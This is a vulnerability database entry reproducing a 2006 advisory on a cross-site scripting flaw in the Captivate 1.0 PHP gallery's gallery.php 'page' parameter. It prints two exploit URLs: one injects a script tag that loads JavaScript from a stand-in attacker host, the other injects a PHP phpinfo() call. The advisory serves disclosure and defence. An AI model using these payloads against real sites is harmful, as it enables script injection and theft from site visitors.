Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12762
HistoryMay 23, 2006 - 12:00 a.m.

Captivate 1.0 - XSS Vuln

2006-05-2300:00:00
vulners.com
8
JSON

Captivate 1.0

Homepage:
http://new-place.org/scripts/

Description:
A basic but highly-customizable PHP gallery script with optional thumbnail creation. Designed with screencaps in mind, it
works best for large galleries of same-sized images.

Effected files:
gallery.php

Inproper filtering of action ?page= can lead to XSS.

Exploit:
One way to XSS would be renaming your JavaScript file to an image as an XSS vector:
http://www.example.com/gallery.php?page=5<SCRIPT SRC=http://evilsite.com/xss.jpg></SCRIPT>

Anoother one be:
http://www.example.com/gallery.php?page=<?phpinfo();?>

The current version of this script puts slashes in for ' and " but alot of other characters aren't filtered.

JSON